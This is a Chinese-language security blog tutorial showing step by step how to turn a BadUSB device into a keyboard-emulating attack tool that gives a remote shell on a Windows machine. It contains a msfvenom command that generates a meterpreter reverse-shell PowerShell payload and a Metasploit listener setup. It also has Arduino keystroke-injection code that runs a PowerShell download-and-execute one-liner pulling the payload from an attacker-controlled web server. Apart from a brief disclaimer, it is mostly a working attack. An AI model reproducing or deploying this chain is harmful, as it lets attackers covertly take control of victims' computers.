关注我们

利用badusb远程控制

星辰星辰 安全文摘 2020-01-22 15271 0


0x01 badusb简介

badusb大家应该都了解过,是利用伪造HID设备执行攻击载荷的一种攻击方式。HID设备一般指的是计算机直接与人交互的设备,例如键盘、鼠标等


总的来说,就是将USB设备伪装成键盘设备,使目标主机被迫执行预置在固件中的恶意代码


通常情况下都会把badusb制作成与U盘极其相似,且不会被受害者所察觉,badusb目前在淘宝有售,下面是详细的用badusb拿shell的过程


0x02 安装Arduino IDE


arduino ide是一款专业的arduino开发工具,主要用于arduino程序的编写和开发,拥有开放源代码的电路图设计、支持ISP在线烧,同时支持Flash、Max/Msp、VVVV、PD、C、Processing等多种程序兼容的特点


首先,官网下载Arduino IDE



下载好后进行安装,将badusb连接主机,配置环境


0x03 利用msf生成windows端木马


在msf中输入以下命令生成木马

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn> -f psh > 1.ps1

启动Apache2,将生成的1.ps1复制到/var/www/html中

serviceapache2 start
sudocp 1.ps1 /var/www/html

进入监听模式

useexploit/multi/handlerset payload 
windows/meterpreter/reverse_tcp 
setLHOST172.16.7.130setLPORT4321
run

0x04 烧录

可以取得开发板信息确定是否连接

在工具中选择开发板:ArduinoLeonardo

选择合适的端口

编程器选择:USBasp

当写入代码后,首先点击第一个按钮进行验证,当显示编译完成则可点击上传进行烧录

代码的编写我们可以借助Automator_2.0.1这款辅助软件,编写代码更加方便

软件:https://github.com/Catboy96/Automator

代码格式介绍


setup() 函数

用来初始化变量、Pin模式、开始使用库等

每次打开或重置Arduino板后,setup()函数将只运行一次


loop() 函数

精确地执行其名称所建议的操作,并连续循环,从而允许程序更改和响应

//参考代码:#include<Keyboard.h> 
//包含键盘模块头文件voidsetup(){//初始化Keyboard.begin();
//开始键盘通信delay(1000);
//延时1000毫秒,Keyboard.press(KEY_LEFT_GUI);
//按下徽标键 也就是win键 Keyboard.press('r');
//按下r键 CMDdelay(500);Keyboard.release(KEY_LEFT_GUI);
//松掉win键Keyboard.release('r');
//松掉r键delay(500);Keyboard.println("powershell IEX (New-Object Net.WebClient).DownloadString('http://XXX.XXX.XXX.XXX/1.ps1')");Keyboard.press(KEY_RETURN); 
//按下回车键Keyboard.release(KEY_RETURN);
//释放回车键delay(500);Keyboard.end();
//结束键盘通讯}voidloop()
//循环,这里的代码{//循环体}



0x05 测试

将烧录好的badusb插入目标主机后,目标主机会自动按下“win+r”键,并自动输入:

powershell IEX (New-ObjectNet.WebClient).DownloadString('http://172.16.7.130/1.ps1')

拿shell成功!

本文章只用于教学,切勿用于非法用途

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢1发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址